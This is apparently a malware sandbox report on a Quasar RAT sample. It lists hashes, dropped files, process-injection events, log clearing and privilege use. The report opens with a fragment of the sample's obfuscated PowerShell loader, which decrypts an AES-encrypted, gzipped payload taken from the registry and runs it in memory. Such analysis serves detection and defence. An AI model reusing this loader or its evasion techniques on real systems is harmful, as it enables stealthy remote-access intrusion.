[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{575ae588-542b-4055-8c53-3889cbfc47d9}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{7f946606-f3f4-4359-8927-7cef8af0882f}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{2c584f31-3b18-4797-aa2d-cf346a1045a5}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{4c2587e7-63b4-4603-8c1e-fc8da29766c3}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{73526fce-b2c6-443a-9feb-27e802959c79}

Network

Country Destination Domain Proto
US 8.8.8.8:53 11.211.222.173.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/2284-4-0x00007FF884DD3000-0x00007FF884DD4000-memory.dmp

memory/2284-9-0x00000185EE970000-0x00000185EE992000-memory.dmp

memory/2284-10-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

memory/2284-15-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

memory/2284-16-0x00000185EED80000-0x00000185EEDF6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xbn1qp2l.tbv.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2284-27-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

memory/2284-32-0x00000185A8000000-0x00000185A8024000-memory.dmp

memory/2284-36-0x00007FF8A1910000-0x00007FF8A19BE000-memory.dmp

memory/2284-35-0x00007FF8A1F80000-0x00007FF8A215B000-memory.dmp

memory/2284-37-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

memory/2284-38-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

memory/2284-39-0x00007FF884DD3000-0x00007FF884DD4000-memory.dmp

memory/2284-40-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

memory/2284-41-0x0000018598290000-0x0000018598CE0000-memory.dmp

memory/2284-43-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

memory/2284-44-0x0000018598CE0000-0x0000018598D86000-memory.dmp

memory/2284-59-0x0000018598D90000-0x0000018598DE6000-memory.dmp

memory/2284-60-0x0000018598DF0000-0x0000018598E48000-memory.dmp

memory/2284-61-0x0000018598E50000-0x0000018598E72000-memory.dmp

memory/2284-64-0x00007FF8A1F80000-0x00007FF8A215B000-memory.dmp

memory/2284-73-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

memory/3432-76-0x0000000140000000-0x0000000140004000-memory.dmp

memory/3432-74-0x0000000140000000-0x0000000140004000-memory.dmp

memory/4544-78-0x0000000000400000-0x0000000000406000-memory.dmp

memory/2284-72-0x0000018599100000-0x000001859910A000-memory.dmp

memory/2284-79-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

memory/4544-81-0x0000000000400000-0x0000000000406000-memory.dmp

memory/2284-82-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 98447a7f26ee9dac6b806924d6e21c90
SHA1 a67909346a56289b7087821437efcaa51da3b083
SHA256 c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed
SHA512 c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b

C:\Windows\$sxr-cmd.exe

MD5 94912c1d73ade68f2486ed4d8ea82de6
SHA1 524ab0a40594d2b5f620f542e87a45472979a416
SHA256 9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9
SHA512 f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d

memory/2252-138-0x000002BF74390000-0x000002BF743B4000-memory.dmp

memory/2252-141-0x00007FF8A1F80000-0x00007FF8A215B000-memory.dmp

memory/2252-142-0x00007FF8A1910000-0x00007FF8A19BE000-memory.dmp

memory/2284-145-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

memory/2284-146-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

memory/2284-147-0x00007FF884DD0000-0x00007FF8857BC000-memory.dmp

memory/2252-148-0x000002BF74BB0000-0x000002BF74CE8000-memory.dmp

memory/2284-153-0x00007FF8A1910000-0x00007FF8A19BE000-memory.dmp

memory/2284-152-0x00007FF8A1F80000-0x00007FF8A215B000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-18 13:35

Reported

2024-08-18 13:37

Platform

win11-20240802-en

Max time kernel

60s

Max time network

55s

Command Line

winlogon.exe

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 5276 created 2804 N/A C:\Windows\system32\WerFault.exe C:\Windows\System32\dllhost.exe
PID 1308 created 6060 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\dllhost.exe

Deletes itself

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A

Indicator Removal: Clear Windows Event Logs

defense_evasion
Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx C:\Windows\System32\svchost.exe N/A

Hide Artifacts: Hidden Window

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 552 set thread context of 4672 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 552 set thread context of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2656 set thread context of 3600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 set thread context of 2992 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 2656 set thread context of 1528 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 set thread context of 2072 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 552 set thread context of 3772 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 552 set thread context of 4984 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2656 set thread context of 5712 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 set thread context of 5964 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 2656 set thread context of 6100 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 set thread context of 5420 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 2656 set thread context of 1796 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 set thread context of 5156 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 2656 set thread context of 5220 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 set thread context of 2504 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 2656 set thread context of 2804 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 2656 set thread context of 6060 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\$sxr-cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File created C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File created C:\Windows\$sxr-mshta.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File opened for modification C:\Windows\$sxr-mshta.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File created C:\Windows\$sxr-cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\$sxr-mshta.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5008 wrote to memory of 552 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
PID 5008 wrote to memory of 552 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
PID 552 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 552 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 552 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 552 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 552 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 552 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 552 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 552 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 552 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
